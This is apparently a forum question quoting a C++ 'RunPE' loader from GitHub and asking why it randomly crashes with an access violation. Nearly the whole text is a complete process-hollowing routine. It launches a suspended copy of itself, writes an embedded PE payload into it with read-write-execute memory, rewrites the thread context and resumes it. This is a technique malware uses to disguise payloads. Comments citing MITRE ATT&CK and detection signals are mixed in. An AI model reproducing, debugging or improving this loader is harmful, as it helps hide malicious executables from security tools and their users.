I got this code from "RunPE" at GitHub:
#include <iostream>
#include <string>
#include <Windows.h>
#include <TlHelp32.h>
#include <iomanip>
#include <fstream>
#include "stdafx.h"
#include <Windows.h>
/*
 * Entry point of the "RunPE" sample. It starts a second copy of the current
 * executable with its main thread suspended, writes the PE image held in
 * rawData into that process, changes the suspended thread's context and
 * resumes it. This is the process-hollowing pattern (MITRE ATT&CK T1055.012):
 * the code that runs in the child no longer matches its image on disk.
 *
 * Detection-relevant API sequence, in the order it appears below:
 *   CreateProcessA(CREATE_SUSPENDED) -> GetThreadContext ->
 *   VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 *   SetThreadContext -> ResumeThread
 *
 * rawData is not defined in this listing. The DWORD(pointer) casts and the
 * Ebx/Eax CONTEXT fields tie the code to 32-bit x86. The results of the
 * memory and context-setting calls are not checked, no handle is closed, and
 * the catch block is empty, so failures are silent.
 */
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
try{
IMAGE_DOS_HEADER* DOSHeader;
IMAGE_NT_HEADERS* NtHeader;
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* ImageBase;
void* pImageBase;
int count;
char CurrentFilePath[1024];
// Interpret rawData as a PE image: DOS header first, NT headers at offset e_lfanew.
DOSHeader = PIMAGE_DOS_HEADER(rawData);
NtHeader = PIMAGE_NT_HEADERS(DWORD(rawData) + DOSHeader->e_lfanew);
// Path of the running executable; it is used as the host process image below.
GetModuleFileNameA(0, CurrentFilePath, 1024);
// Continue only when the NT headers carry the expected signature.
if (NtHeader->Signature == IMAGE_NT_SIGNATURE)
{
ZeroMemory(&PI, sizeof(PI));
ZeroMemory(&SI, sizeof(SI));
// Launch a second instance of this executable with its main thread suspended.
// A process that spawns itself suspended is a behavioural indicator by itself.
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
{
// Local buffer that receives the child's thread context.
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL;
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
{
// Read 4 bytes from the child at Ebx + 8; the value stored in ImageBase is not used afterwards.
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);
// Request SizeOfImage bytes in the child at the payload's preferred base.
// 0x3000 is MEM_COMMIT | MEM_RESERVE; a remote read-write-execute allocation
// is one of the strongest signals endpoint tooling has for this pattern.
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
// Copy the PE headers into the child.
WriteProcessMemory(PI.hProcess, pImageBase, rawData, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
// Copy every section to its VirtualAddress. 248 and 40 are the hard-coded sizes of
// IMAGE_NT_HEADERS32 and IMAGE_SECTION_HEADER, used to walk the section table.
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
{
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(rawData) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
LPVOID(DWORD(rawData) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
}
// Overwrite the 4 bytes at Ebx + 8 in the child with the payload's ImageBase value.
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
// Set Eax to the payload's entry point, apply the modified context and let the thread run.
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
ResumeThread(PI.hThread);
}
}
}
}catch(...){
// Empty handler: any C++ exception raised above is discarded without a trace.
}
}
The problem is that it works, but I randomly get this error:
The application was unable to start correctly (0xc0000005). click OK to close the application.
I could not find any specific value that causes this crash, and stepping through the code in the debugger did not reveal anything.
Where did I make a mistake, and how can I fix it?
P.S. rawData is a PE file converted with the HxD software.